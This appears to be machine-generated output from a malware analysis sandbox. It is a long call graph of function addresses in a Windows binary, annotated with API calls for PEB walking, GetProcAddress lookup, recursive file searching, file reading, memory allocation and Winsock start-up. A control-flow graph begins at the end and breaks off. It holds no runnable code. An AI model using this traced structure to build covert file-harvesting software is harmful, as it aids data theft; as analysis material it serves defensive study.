407e3e 10238->10241 10242 402bab 2 API calls 10238->10242 10245 407e51 10238->10245 10239 407eb6 10239->10245 10246 402bab 2 API calls 10239->10246 10240 407ed4 10241->10240 10244 402bab 2 API calls 10241->10244 10242->10241 10243 402bab 2 API calls 10243->10239 10244->10245 10245->10240 10248 402bab 2 API calls 10245->10248 10246->10245 10247->10239 10249 405872 4 API calls 10247->10249 10254 407ea6 10247->10254 10248->10240 10250 407e86 10249->10250 10251 405872 4 API calls 10250->10251 10252 407e96 10251->10252 10253 405872 4 API calls 10252->10253 10253->10254 10254->10239 10254->10243 9545 405924 9546 4031e5 4 API calls 9545->9546 9547 405937 StrStrW 9546->9547 10263 410927 10264 4044ee 7 API calls 10263->10264 10265 41093d 10264->10265 10266 4109a4 10265->10266 10267 4056bf 2 API calls 10265->10267 10270 410954 10267->10270 10268 4044ee 7 API calls 10268->10270 10270->10268 10271 402bab 2 API calls 10270->10271 10272 410990 10270->10272 10278 41080e 10270->10278 10271->10270 10273 413aca 4 API calls 10272->10273 10274 410998 10273->10274 10275 405695 2 API calls 10274->10275 10276 41099e 10275->10276 10277 402bab 2 API calls 10276->10277 10277->10266 10279 410821 10278->10279 10289 41091f 10279->10289 10290 410701 10279->10290 10282 405872 4 API calls 10283 410900 10282->10283 10284 405872 4 API calls 10283->10284 10285 41090d 10284->10285 10286 405872 4 API calls 10285->10286 10287 410919 10286->10287 10288 402bab 2 API calls 10287->10288 10288->10289 10289->10270 10291 405f08 4 API calls 10290->10291 10293 410713 10291->10293 10292 410804 10292->10282 10292->10289 10293->10292 10294 402b7c 2 API calls 10293->10294 10295 410748 10294->10295 10297 402b7c 2 API calls 10295->10297 10299 4107fd 10295->10299 10296 402bab 2 API calls 10296->10292 10300 4107ad 10297->10300 10298 402bab 2 API calls 10298->10299 10299->10296 10300->10298 10301 40d726 10302 404bee 6 API calls 10301->10302 10303 40d73f 10302->10303 10304 40db63 10303->10304 10305 405872 4 API calls 10303->10305 10308 40d761 10305->10308 10306 404bee 6 API calls 10306->10308 10307 405872 4 API calls 10307->10308 10308->10306 10308->10307 10310 40d971 10308->10310 10309 404ba7 4 API calls 10309->10310 10310->10309 10311 405781 4 API calls 10310->10311 10313 40d9bb 10310->10313 10311->10310 10312 404c4e 6 API calls 10312->10313 10313->10304 10313->10312 10314 405781 4 API calls 10313->10314 10315 4037be 4 API calls 10313->10315 10316 405872 4 API calls 10313->10316 10314->10313 10315->10313 10316->10313 9603 40f12f 9604 41219c 14 API calls 9603->9604 9605 40f13f 9604->9605 9606 41219c 14 API calls 9605->9606 9607 40f14c 9606->9607 9608 41219c 14 API calls 9607->9608 9609 40f159 9608->9609 9610 41219c 14 API calls 9609->9610 9611 40f166 9610->9611 9618 40ed35 9619 4056bf 2 API calls 9618->9619 9620 40ed42 9619->9620 9621 412093 20 API calls 9620->9621 9622 40ed63 9621->9622 9623 412093 20 API calls 9622->9623 9624 40ed73 9623->9624 9625 413aca 4 API calls 9624->9625 9626 40ed80 9625->9626 9627 405695 2 API calls 9626->9627 9628 40ed8e 9627->9628 8072 40f3c5 8077 41219c 8072->8077 8075 41219c 14 API calls 8076 40f3e1 8075->8076 8078 4121b1 8077->8078 8093 40f3d3 8077->8093 8079 4121be 8078->8079 8083 4121c5 8078->8083 8125 413ba4 8079->8125 8080 4121ca 8095 404056 8080->8095 8083->8080 8087 412210 8083->8087 8084 4121c3 8084->8093 8102 405b6f 8084->8102 8087->8093 8130 403fbf 8087->8130 8088 41224d 8090 402bab 2 API calls 8088->8090 8088->8093 8090->8093 8093->8075 8141 402b7c GetProcessHeap RtlAllocateHeap 8095->8141 8097 404066 8099 404095 8097->8099 8143 4031e5 8097->8143 8099->8084 8101 402bab 2 API calls 8101->8099 8103 405b7d 8102->8103 8104 402b7c 2 API calls 8103->8104 8105 405b99 8104->8105 8114 405c02 8105->8114 8179 4059b8 8105->8179 8107 405c09 8109 402bab 2 API calls 8107->8109 8108 405bba 8108->8107 8110 402b7c 2 API calls 8108->8110 8109->8114 8111 405bdd 8110->8111 8111->8107 8112 405be4 8111->8112 8113 402bab 2 API calls 8112->8113 8113->8114 8114->8088 8115 413a58 8114->8115 8116 413a63 8115->8116 8124 412245 8115->8124 8116->8124 8182 405781 8116->8182 8119 405781 4 API calls 8120 413aa0 8119->8120 8185 4057df 8120->8185 8123 405781 4 API calls 8123->8124 8138 402bab 8124->8138 8126 413bad 8125->8126 8127 404056 6 API calls 8126->8127 8129 413bb8 8126->8129 8128 413bc5 8127->8128 8128->8084 8129->8084 8131 402b7c 2 API calls 8130->8131 8132 403fcf 8131->8132 8133 403ff4 8132->8133 8304 403b98 8132->8304 8133->8084 8136 403ff8 GetLastError 8137 402bab 2 API calls 8136->8137 8137->8133 8139 402bb4 GetProcessHeap HeapFree 8138->8139 8140 402bc6 8138->8140 8139->8140 8140->8088 8142 402b98 8141->8142 8142->8097 8144 4031f3 8143->8144 8145 403236 8143->8145 8144->8145 8148 403208 8144->8148 8154 4030a5 8145->8154 8147 403224 8150 403258 8147->8150 8152 4031e5 4 API calls 8147->8152 8160 403263 8148->8160 8150->8099 8150->8101 8151 40320d 8151->8150 8153 4030a5 4 API calls 8151->8153 8152->8150 8153->8147 8166 402ca4 8154->8166 8156 4030b0 8157 4030b5 8156->8157 8170 4030c4 8156->8170 8157->8147 8161 40326d 8160->8161 8162 402b7c 2 API calls 8161->8162 8165 4032b7 8161->8165 8163 40328c 8162->8163 8164 402b7c 2 API calls 8163->8164 8164->8165 8165->8151 8167 403079 8166->8167 8169 40307c 8167->8169 8174 40317b GetPEB 8167->8174 8169->8156 8173 4030eb 8170->8173 8171 4030c0 8171->8147 8173->8171 8176 402c03 8173->8176 8175 40319b 8174->8175 8175->8169 8177 4031e5 3 API calls 8176->8177 8178 402c15 GetProcAddress 8177->8178 8178->8171 8180 4031e5 4 API calls 8179->8180 8181 4059cb 8180->8181 8181->8108 8200 405797 8182->8200 8184 405792 8184->8119 8186 405832 8185->8186 8187 4057eb 8185->8187 8186->8123 8186->8124 8187->8186 8210 4040bb 8187->8210 8190 405839 8192 405853 8190->8192 8237 405627 8190->8237 8191 40582c 8234 403f9e 8191->8234 8248 405762 8192->8248 8198 403f9e 5 API calls 8198->8186 8201 4057a1 8200->8201 8202 4057bd 8200->8202 8201->8202 8204 4056fc 8201->8204 8202->8184 8205 405714 8204->8205 8206 402b7c 2 API calls 8205->8206 8207 405730 8206->8207 8208 402bab 2 API calls 8207->8208 8209 405752 8207->8209 8208->8209 8209->8202 8211 4031e5 4 API calls 8210->8211 8212 4040d5 CreateFileW 8211->8212 8213 4040f8 8212->8213 8214 40418d 8212->8214 8215 4031e5 4 API calls 8213->8215 8216 404183 8214->8216 8254 403c90 8214->8254 8222 404105 8215->8222 8216->8186 8216->8190 8216->8191 8220 40416d 8251 403c40 8220->8251 8222->8220 8226 4031e5 4 API calls 8222->8226 8224 4040bb 9 API calls 8227 4041c8 8224->8227 8225 402bab 2 API calls 8225->8216 8228 404131 VirtualAlloc 8226->8228 8227->8225 8228->8220 8229 404142 8228->8229 8230 4031e5 4 API calls 8229->8230 8231 40414f ReadFile 8230->8231 8231->8220 8232 404160 8231->8232 8233 4031e5 4 API calls 8232->8233 8233->8220 8235 4031e5 4 API calls 8234->8235 8236 403fb1 VirtualFree 8235->8236 8236->8186 8238 4031e5 4 API calls 8237->8238 8239 40563a 8238->8239 8240 405872 8239->8240 8242 405881 8240->8242 8241 4058bc 8243 405797 4 API calls 8241->8243 8245 4058af 8241->8245 8242->8241 8301 4058d4 8242->8301 8243->8245 8245->8192 8247 405781 4 API calls 8247->8241 8249 405781 4 API calls 8248->8249 8250 405770 8249->8250 8250->8198 8252 4031e5 4 API calls 8251->8252 8253 403c52 CloseHandle 8252->8253 8253->8216 8255 403ca3 8254->8255 8258 403caa 8254->8258 8281 405dc5 8255->8281 8257 404056 6 API calls 8259 403cbe 8257->8259 8258->8257 8260 403d3a 8258->8260 8261 403d2e 8259->8261 8262 403d17 8259->8262 8263 403ccf 8259->8263 8260->8216 8277 403c59 8260->8277 8261->8260 8265 402bab 2 API calls 8261->8265 8266 405b6f 6 API calls 8262->8266 8264 405b6f 6 API calls 8263->8264 8268 403cdd 8264->8268 8265->8260 8267 403d14 8266->8267 8270 402bab 2 API calls 8267->8270 8269 405b6f 6 API calls 8268->8269 8271 403cee 8269->8271 8270->8261 8271->8267 8286 403d4d 8271->8286 8274 403d0b 8276 402bab 2 API calls 8274->8276 8276->8267 8278 403c21 8277->8278 8279 4031e5 4 API calls 8278->8279 8280 403c33 8279->8280 8280->8224 8280->8227 8295 406799 8281->8295 8283 405dd5 8284 402b7c 2 API calls 8283->8284 8285 405dfe 8284->8285 8285->8258 8298 403bb7 8286->8298 8288 403cfe 8288->8274 8289 403c62 8288->8289 8290 403d4d 5 API calls 8289->8290 8291 403c6d 8290->8291 8292 403c72 8291->8292 8293 4031e5 4 API calls 8291->8293 8292->8274 8294 403c87 CreateDirectoryW 8293->8294 8294->8274 8296 4031e5 4 API calls 8295->8296 8297 4067ad 8296->8297 8297->8283 8299 4031e5 4 API calls 8298->8299 8300 403bc9 GetFileAttributesW 8299->8300 8300->8288 8302 405797 4 API calls 8301->8302 8303 4058a8 8302->8303 8303->8245 8303->8247 8305 4031e5 4 API calls 8304->8305 8306 403baa 8305->8306 8306->8133 8306->8136 9743 40ebc6 9744 4040bb 12 API calls 9743->9744 9745 40ebdf 9744->9745 9746 40ecd7 9745->9746 9763 407795 9745->9763 9749 40eccd 9751 403f9e 5 API calls 9749->9751 9750 4056bf 2 API calls 9761 40ec12 9750->9761 9751->9746 9752 40ecb5 9753 402bab 2 API calls 9752->9753 9754 40ecbd 9753->9754 9755 413aca 4 API calls 9754->9755 9756 40ecc7 9755->9756 9757 405695 2 API calls 9756->9757 9757->9749 9758 407908 GetProcessHeap RtlAllocateHeap 9758->9761 9760 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9760->9761 9761->9752 9761->9758 9761->9760 9762 402bab GetProcessHeap HeapFree 9761->9762 9774 412269 9761->9774 9762->9761 9765 4077ab 9763->9765 9764 4077b3 9764->9749 9764->9750 9765->9764 9781 405ae9 9765->9781 9767 4077e1 9767->9764 9768 407802 9767->9768 9769 4077f8 9767->9769 9771 402b7c 2 API calls 9768->9771 9770 402bab 2 API calls 9769->9770 9770->9764 9772 407811 9771->9772 9773 402bab 2 API calls 9772->9773 9773->9764 9797 40374e 9774->9797 9777 412299 9777->9761 9780 402bab 2 API calls 9780->9777 9782 405af7 9781->9782 9783 402b7c 2 API calls 9782->9783 9784 405b03 9783->9784 9793 405b5a 9784->9793 9794 405998 9784->9794 9786 405b21 9787 405b61 9786->9787 9789 402b7c 2 API calls 9786->9789 9788 402bab 2 API calls 9787->9788 9788->9793 9790 405b39 9789->9790 9790->9787 9791 405b40 9790->9791 9792 402bab 2 API calls 9791->9792 9792->9793 9793->9767 9795 4031e5 4 API calls 9794->9795 9796 4059ab 9795->9796 9796->9786 9798 402b7c 2 API calls 9797->9798 9799 40375f 9798->9799 9800 4031e5 4 API calls 9799->9800 9803 4037a3 9799->9803 9801 40378f 9800->9801 9802 402bab 2 API calls 9801->9802 9801->9803 9802->9803 9803->9777 9804 4037be 9803->9804 9805 4031e5 4 API calls 9804->9805 9806 4037e2 9805->9806 9807 40382b 9806->9807 9808 402b7c 2 API calls 9806->9808 9807->9780 9809 403802 9808->9809 9810 403832 9809->9810 9812 403809 9809->9812 9811 4036a3 4 API calls 9810->9811 9811->9807 9813 4036a3 4 API calls 9812->9813 9813->9807 8904 410cd1 8909 412093 8904->8909 8907 412093 20 API calls 8908 410cff 8907->8908 8911 4120a5 8909->8911 8930 410cf1 8909->8930 8910 4120b3 8912 404056 6 API calls 8910->8912 8911->8910 8916 412100 8911->8916 8913 4120ba 8912->8913 8914 405b6f 6 API calls 8913->8914 8915 412152 8913->8915 8913->8930 8918 412125 8914->8918 8931 403d74 8915->8931 8917 403fbf 7 API calls 8916->8917 8916->8930 8917->8913 8918->8915 8922 412139 8918->8922 8923 41214d 8918->8923 8921 41218c 8925 402bab 2 API calls 8921->8925 8921->8930 8927 402bab 2 API calls 8922->8927 8926 402bab 2 API calls 8923->8926 8924 402bab 2 API calls 8924->8921 8925->8930 8926->8915 8928 41213e 8927->8928 8929 402bab 2 API calls 8928->8929 8929->8930 8930->8907 8932 403d87 8931->8932 8933 403ea3 8932->8933 8934 405b6f 6 API calls 8932->8934 8935 405b6f 6 API calls 8933->8935 8936 403da3 8934->8936 8937 403eb9 8935->8937 8936->8933 8938 4031e5 4 API calls 8936->8938 8939 4031e5 4 API calls 8937->8939 8945 403f6f 8937->8945 8941 403dbc FindFirstFileW 8938->8941 8940 403ed3 FindFirstFileW 8939->8940 8957 403f8d 8940->8957 8961 403ee8 8940->8961 8952 403e9c 8941->8952 8962 403dd1 8941->8962 8942 402bab 2 API calls 8942->8945 8943 402bab 2 API calls 8943->8933 8944 4031e5 4 API calls 8946 403e84 FindNextFileW 8944->8946 8945->8921 8945->8924 8947 403e96 8946->8947 8946->8962 8971 403bef 8947->8971 8948 4031e5 4 API calls 8951 403f50 FindNextFileW 8948->8951 8950 405b6f 6 API calls 8950->8961 8954 403f87 8951->8954 8951->8961 8952->8943 8953 405b6f 6 API calls 8953->8962 8956 403bef 5 API calls 8954->8956 8955 403f75 8958 402bab 2 API calls 8955->8958 8956->8957 8957->8942 8960 403f7b 8958->8960 8959 403d74 15 API calls 8959->8962 8963 403bef 5 API calls 8960->8963 8961->8948 8961->8950 8961->8955 8964 402bab 2 API calls 8961->8964 8974 40fa23 8961->8974 8962->8944 8962->8953 8962->8959 8965 402bab 2 API calls 8962->8965 8966 403f63 8962->8966 8963->8945 8964->8961 8965->8962 8967 402bab 2 API calls 8966->8967 8968 403f69 8967->8968 8969 403bef 5 API calls 8968->8969 8969->8945 8972 4031e5 4 API calls 8971->8972 8973 403c01 FindClose 8972->8973 8973->8952 8975 40fa39 8974->8975 8976 410293 8975->8976 8977 405b6f 6 API calls 8975->8977 8976->8961 8978 40ffcc 8977->8978 8978->8976 8979 4040bb 12 API calls 8978->8979 8980 40ffeb 8979->8980 8981 41028c 8980->8981 8984 402b7c 2 API calls 8980->8984 9029 41027d 8980->9029 8982 402bab 2 API calls 8981->8982 8982->8976 8983 403f9e 5 API calls 8983->8981 8985 41001e 8984->8985 8986 40a423 4 API calls 8985->8986 8985->9029 8987 41004a 8986->8987 8988 4031e5 4 API calls 8987->8988 8989 41005c 8988->8989 8990 4031e5 4 API calls 8989->8990 8991 410079 8990->8991 8992 4031e5 4 API calls 8991->8992 8993 410096 8992->8993 8994 4031e5 4 API calls 8993->8994 8995 4100b0 8994->8995 8996 4031e5 4 API calls 8995->8996 8997 4100cd 8996->8997 8998 4031e5 4 API calls 8997->8998 8999 4100ea 8998->8999 9030 412516 8999->9030 9001 4100fd 9002 40642c 5 API calls 9001->9002 9003 41013e 9002->9003 9004 410142 9003->9004 9005 41019f 9003->9005 9006 40488c 5 API calls 9004->9006 9008 4031e5 4 API calls 9005->9008 9007 410151 9006->9007 9010 41019c 9007->9010 9011 404866 4 API calls 9007->9011 9022 4101bb 9008->9022 9009 41022a 9019 413a58 13 API calls 9009->9019 9010->9009 9012 40642c 5 API calls 9010->9012 9013 410163 9011->9013 9014 410201 9012->9014 9018 406c4c 6 API calls 9013->9018 9026 41018e 9013->9026 9016 410205 9014->9016 9017 41022f 9014->9017 9015 403c40 5 API calls 9015->9010 9020 4126a7 7 API calls 9016->9020 9033 4125db 9017->9033 9023 410178 9018->9023 9027 41026e 9019->9027 9020->9009 9024 4031e5 4 API calls 9022->9024 9025 406c4c 6 API calls 9023->9025 9024->9010 9025->9026 9026->9015 9028 402bab 2 API calls 9027->9028 9028->9029 9029->8983 9031 4031e5 4 API calls 9030->9031 9032 412539 9031->9032 9032->9001 9034 40488c 5 API calls 9033->9034 9035 4125ec 9034->9035 9036 41269f 9035->9036 9037 4031e5 4 API calls 9035->9037 9036->9009 9038 412609 9037->9038 9040 4031e5 4 API calls 9038->9040 9045 41268f 9038->9045 9039 403c40 5 API calls 9039->9036 9041 41262a 9040->9041 9049 412675 9041->9049 9050 4124f1 9041->9050 9043 4031e5 4 API calls 9043->9045 9045->9039 9046 412663 9048 4031e5 4 API calls 9046->9048 9047 4124f1 4 API calls 9047->9046 9048->9049 9049->9043 9051 4031e5 4 API calls 9050->9051 9052 412503 9051->9052 9052->9046 9052->9047 9239 4049dc 9240 4031e5 4 API calls 9239->9240 9241 4049ef 9240->9241 9896 40cddd 9897 405b6f 6 API calls 9896->9897 9898 40cdee 9897->9898 9899 40ce06 9898->9899 9900 413a58 13 API calls 9898->9900 9901 405b6f 6 API calls 9899->9901 9907 40ce59 9899->9907 9902 40ce00 9900->9902 9904 40ce1c 9901->9904 9903 402bab 2 API calls 9902->9903 9903->9899 9906 403d74 19 API calls 9904->9906 9904->9907 9910 40ce52 9904->9910 9905 402bab 2 API calls 9905->9907 9908 40ce45 9906->9908 9909 402bab 2 API calls 9908->9909 9908->9910 9909->9910 9910->9905 9242 40ecde 9243 412093 20 API calls 9242->9243 9244 40ecfd 9243->9244 9245 412093 20 API calls 9244->9245 9246 40ed0d 9245->9246 9250 40e8df 9251 412093 20 API calls 9250->9251 9252 40e8f8 9251->9252 9253 412093 20 API calls 9252->9253 9254 40e908 9253->9254 9261 404b22 9254->9261 9256 40e91c 9257 40e936 9256->9257 9260 40e93d 9256->9260 9268 40e944 9256->9268 9259 402bab 2 API calls 9257->9259 9259->9260 9262 402b7c 2 API calls 9261->9262 9263 404b33 9262->9263 9267 404b66 9263->9267 9277 4049b3 9263->9277 9266 402bab 2 API calls 9266->9267 9267->9256 9269 4056bf 2 API calls 9268->9269 9270 40e952 9269->9270 9271 4057df 13 API calls 9270->9271 9276 40e976 9270->9276 9272 40e966 9271->9272 9273 413aca 4 API calls 9272->9273 9274 40e970 9273->9274 9275 405695 2 API calls 9274->9275 9275->9276 9276->9257 9278 4031e5 4 API calls 9277->9278 9279 4049c6 9278->9279 9279->9266 9279->9267 9280 4139de 9289 413855 9280->9289 9282 4139f1 9283 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9282->9283 9288 4139f7 9283->9288 9284 413866 58 API calls 9285 413a2d 9284->9285 9286 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9285->9286 9287 413a34 9286->9287 9288->9284 9290 4031e5 4 API calls 9289->9290 9291 413864 9290->9291 9291->9291 9916 4116e7 9917 4117ba 9916->9917 9918 4117f1 9917->9918 9919 405b6f 6 API calls 9917->9919 9920 4117d0 9919->9920 9920->9918 9921 404cbf 8 API calls 9920->9921 9922 4117eb 9921->9922 9923 402bab 2 API calls 9922->9923 9923->9918 9311 4094e7 9312 404b22 6 API calls 9311->9312 9313 4094fe 9312->9313 9314 409554 9313->9314 9315 405b6f 6 API calls 9313->9315 9316 409514 9315->9316 9317 404b22 6 API calls 9316->9317 9323 40954d 9316->9323 9319 40952d 9317->9319 9318 402bab 2 API calls 9318->9314 9320 409408 15 API calls 9319->9320 9325 409544 9319->9325 9322 40953e 9320->9322 9321 402bab 2 API calls 9321->9323 9324 402bab 2 API calls 9322->9324 9323->9318 9324->9325 9325->9321 9334 4058ea 9335 4031e5 4 API calls 9334->9335 9336 4058fd StrStrA 9335->9336 9968 40d4ea 9969 404bee 6 API calls 9968->9969 9970 40d500 9969->9970 9971 40d5a0 9970->9971 9972 404bee 6 API calls 9970->9972 9973 40d529 9972->9973 9974 404bee 6 API calls 9973->9974 9975 40d537 9974->9975 9976 404bee 6 API calls 9975->9976 9977 40d546 9976->9977 9977->9971 9978 405872 4 API calls 9977->9978 9979 40d56d 9978->9979 9980 405872 4 API calls 9979->9980 9981 40d57c 9980->9981 9982 405872 4 API calls 9981->9982 9983 40d58e 9982->9983 9984 405872 4 API calls 9983->9984 9984->9971 9985 40a3ea 9986 40374e 6 API calls 9985->9986 9987 40a403 9986->9987 9988 40a419 9987->9988 9989 4059d8 4 API calls 9987->9989 9990 40a411 9989->9990 9991 402bab 2 API calls 9990->9991 9991->9988 9374 404df3 WSAStartup 9378 4091f6 9379 404b22 6 API calls 9378->9379 9380 40920b 9379->9380 9381 409222 9380->9381 9382 409408 15 API calls 9380->9382 9383 40921c 9382->9383 9384 402bab 2 API calls 9383->9384 9384->9381 10018 4117fe 10019 404c4e 6 API calls 10018->10019 10020 411888 10019->10020 10021 404c4e 6 API calls 10020->10021 10023 411925 10020->10023 10022 4118ab 10021->10022 10022->10023 10037 4119b3 10022->10037 10025 4118c5 10026 4119b3 4 API calls 10025->10026 10027 4118d0 10026->10027 10027->10023 10028 4056bf 2 API calls 10027->10028 10029 4118fd 10028->10029 10030 405872 4 API calls 10029->10030 10031 41190a 10030->10031 10032 405872 4 API calls 10031->10032 10033 411915 10032->10033 10034 413aca 4 API calls 10033->10034 10035 41191f 10034->10035 10036 405695 2 API calls 10035->10036 10036->10023 10038 4119c6 10037->10038 10039 4119bf 10037->10039 10040 4031e5 4 API calls 10038->10040 10039->10025 10040->10039 9388 40e880 9389 41219c 14 API calls 9388->9389 9390 40e88e 9389->9390 9391 41219c 14 API calls 9390->9391 9392 40e89c 9391->9392 10104 40e48a 10105 404bee 6 API calls 10104->10105 10106 40e4d0 10105->10106 10107 40e4f4 10106->10107 10108 405872 4 API calls 10106->10108 10108->10107 9489 410390 9490 404b22 6 API calls 9489->9490 9491 4103a5 9490->9491 9492 410409 9491->9492 9493 405b6f 6 API calls 9491->9493 9496 4103ba 9493->9496 9494 410402 9495 402bab 2 API calls 9494->9495 9495->9492 9496->9494 9498 403d74 19 API calls 9496->9498 9501 4103fb 9496->9501 9497 402bab 2 API calls 9497->9494 9499 4103ee 9498->9499 9500 402bab 2 API calls 9499->9500 9499->9501 9500->9501 9501->9497 10119 40ed96 10120 4040bb 12 API calls 10119->10120 10134 40edb0 10120->10134 10121 40ef90 10122 40ef87 10123 403f9e 5 API calls 10122->10123 10123->10121 10124 405ae9 6 API calls 10124->10134 10125 412269 6 API calls 10125->10134 10126 40ef61 10129 40ef6e 10126->10129 10130 402bab 2 API calls 10126->10130 10127 402bab GetProcessHeap HeapFree 10127->10134 10128 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10128->10134 10131 40ef7c 10129->10131 10132 402bab 2 API calls 10129->10132 10130->10129 10131->10122 10133 402bab 2 API calls 10131->10133 10132->10131 10133->10122 10134->10121 10134->10122 10134->10124 10134->10125 10134->10126 10134->10127 10134->10128 10135 40ef98 10136 404c4e 6 API calls 10135->10136 10137 40efb6 10136->10137 10138 40f02a 10137->10138 10150 40f054 10137->10150 10141 404bee 6 API calls 10142 40efda 10141->10142 10143 404bee 6 API calls 10142->10143 10144 40efe9 10143->10144 10144->10138 10145 405872 4 API calls 10144->10145 10146 40f008 10145->10146 10147 405872 4 API calls 10146->10147 10148 40f01a 10147->10148 10149 405872 4 API calls 10148->10149 10149->10138 10151 40f064 10150->10151 10152 402b7c 2 API calls 10151->10152 10154 40f072 10152->10154 10153 40efca 10153->10141 10154->10153 10156 405ecd 10154->10156 10157 4059b8 4 API calls 10156->10157 10158 405edf 10157->10158 10158->10154 9508 410c98 9509 41219c 14 API calls 9508->9509 9510 410ca8 9509->9510 9511 41219c 14 API calls 9510->9511 9512 410cb5 9511->9512 9513 412093 20 API calls 9512->9513 9514 410cc9 9513->9514 10228 41249c 10229 4056bf 2 API calls 10228->10229 10230 4124aa 10229->10230 10231 4057df 13 API calls 10230->10231 10236 4124ce 10230->10236 10232 4124be 10231->10232 10233 413aca 4 API calls 10232->10233 10234 4124c8 10233->10234 10235 405695 2 API calls 10234->10235 10235->10236 9518 40f49e 9519 40f4b6 13 API calls 9518->9519 9520 40f4a8 9519->9520 9521 40929e 9522 413b28 6 API calls 9521->9522 9523 4092a4 9522->9523 9524 405b6f 6 API calls 9523->9524 9525 4092af 9524->9525 9526 4092c5 9525->9526 9527 409408 15 API calls 9525->9527 9528 4092bf 9527->9528 9529 402bab 2 API calls 9528->9529 9529->9526 10255 407fa4 10256 407fb7 10255->10256 10257 402b7c 2 API calls 10256->10257 10259 407fee 10256->10259 10258 40800d 10257->10258 10258->10259 10260 4037be 4 API calls 10258->10260 10261 40803c 10260->10261 10262 402bab 2 API calls 10261->10262 10262->10259 9566 4090aa 9567 404b22 6 API calls 9566->9567 9568 4090c1 9567->9568 9569 4090d8 9568->9569 9570 409408 15 API calls 9568->9570 9571 404b22 6 API calls 9569->9571 9572 4090d2 9570->9572 9573 4090eb 9571->9573 9574 402bab 2 API calls 9572->9574 9575 408c4d 15 API calls 9573->9575 9578 409104 9573->9578 9574->9569 9576 4090fe 9575->9576 9577 402bab 2 API calls 9576->9577 9577->9578 9585 409cae 9600 404b79 9585->9600 9587 409cc5 9588 409d27 9587->9588 9590 405b6f 6 API calls 9587->9590 9591 409d2f 9587->9591 9589 402bab 2 API calls 9588->9589 9589->9591 9592 409cec 9590->9592 9592->9588 9593 404b79 6 API calls 9592->9593 9594 409d05 9593->9594 9595 409d1e 9594->9595 9596 408c4d 15 API calls 9594->9596 9597 402bab 2 API calls 9595->9597 9598 409d18 9596->9598 9597->9588 9599 402bab 2 API calls 9598->9599 9599->9595 9601 404b22 6 API calls 9600->9601 9602 404b8a 9601->9602 9602->9587 10322 411fb3 10323 405b6f 6 API calls 10322->10323 10325 412013 10323->10325 10324 412075 10325->10324 10340 41206a 10325->10340 10341 411a8d 10325->10341 10327 402bab 2 API calls 10327->10324 10329 4056bf 2 API calls 10330 41203d 10329->10330 10331 405872 4 API calls 10330->10331 10332 41204a 10331->10332 10333 413aca 4 API calls 10332->10333 10334 412054 10333->10334 10335 405695 2 API calls 10334->10335 10336 41205a 10335->10336 10337 413a58 13 API calls 10336->10337 10338 412064 10337->10338 10339 402bab 2 API calls 10338->10339 10339->10340 10340->10327 10342 402b7c 2 API calls 10341->10342 10343 411aa3 10342->10343 10351 411f05 10343->10351 10364 404ada 10343->10364 10346 404ada 4 API calls 10347 411cad 10346->10347 10348 411f0c 10347->10348 10349 411cc0 10347->10349 10350 402bab 2 API calls 10348->10350 10367 405eb6 10349->10367 10350->10351 10351->10329 10351->10340 10353 411d3c 10354 4031e5 4 API calls 10353->10354 10362 411d7b 10354->10362 10355 411ea6 10356 4031e5 4 API calls 10355->10356 10357 411eb5 10356->10357 10358 4031e5 4 API calls 10357->10358 10359 411ed6 10358->10359 10360 405eb6 4 API calls 10359->10360 10360->10351 10361 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10361->10362 10362->10355 10362->10361 10363 405eb6 4 API calls 10362->10363 10363->10362 10365 4031e5 4 API calls 10364->10365 10366 404afd 10365->10366 10366->10346 10368 405998 4 API calls 10367->10368 10369 405ec8 10368->10369 10369->10353 9632 40f6b8 9633 41219c 14 API calls 9632->9633 9634 40f6c7 9633->9634 9635 41219c 14 API calls 9634->9635 9636 40f6d5 9635->9636 9637 41219c 14 API calls 9636->9637 9638 40f6df 9637->9638 9657 40d6bd 9658 4056bf 2 API calls 9657->9658 9659 40d6c9 9658->9659 9670 404cbf 9659->9670 9662 404cbf 8 API calls 9663 40d6f4 9662->9663 9664 404cbf 8 API calls 9663->9664 9665 40d702 9664->9665 9666 413aca 4 API calls 9665->9666 9667 40d711 9666->9667 9668 405695 2 API calls 9667->9668 9669 40d71f 9668->9669 9671 402b7c 2 API calls 9670->9671 9672 404ccd 9671->9672 9673 404ddc 9672->9673 9674 404b8f 5 API calls 9672->9674 9673->9662 9675 404ce4 9674->9675 9676 404dd4 9675->9676 9678 402b7c 2 API calls 9675->9678 9677 402bab 2 API calls 9676->9677 9677->9673 9679 404d04 9678->9679 9680 404dcc 9679->9680 9682 404dc6 9679->9682 9683 402b7c 2 API calls 9679->9683 9685 404b8f 5 API calls 9679->9685 9686 402bab GetProcessHeap HeapFree 9679->9686 9687 404a39 5 API calls 9679->9687 9688 405b6f 6 API calls 9679->9688 9689 404cbf 8 API calls 9679->9689 9681 404a39 5 API calls 9680->9681 9681->9676 9684 402bab 2 API calls 9682->9684 9683->9679 9684->9680 9685->9679 9686->9679 9687->9679 9688->9679 9689->9679 9690 40f0bf 9691 4056bf 2 API calls 9690->9691 9692 40f0c9 9691->9692 9693 40f115 9692->9693 9695 404cbf 8 API calls 9692->9695 9694 41219c 14 API calls 9693->9694 9696 40f128 9694->9696 9697 40f0ed 9695->9697 9698 404cbf 8 API calls 9697->9698 9699 40f0fb 9698->9699 9700 413aca 4 API calls 9699->9700 9701 40f10a 9700->9701 9702 405695 2 API calls 9701->9702 9702->9693

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 161 403dd1-403dd8 151->161 162 403e9d-403ea4 call 402bab 151->162 154 403f97-403f9d 152->154 159 403ee8-403ef8 call 405d24 153->159 160 403f8e-403f94 call 402bab 153->160 176 403f03-403f0a 159->176 177 403efa-403f01 159->177 160->152 166 403e75-403e90 call 4031e5 FindNextFileW 161->166 167 403dde-403de2 161->167 162->150 166->161 180 403e96-403e97 call 403bef 166->180 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 189 403e30-403e4c call 405b6f 172->189 190 403e24-403e2e 172->190 173->166 186 403dfb-403e10 call 405eff 173->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 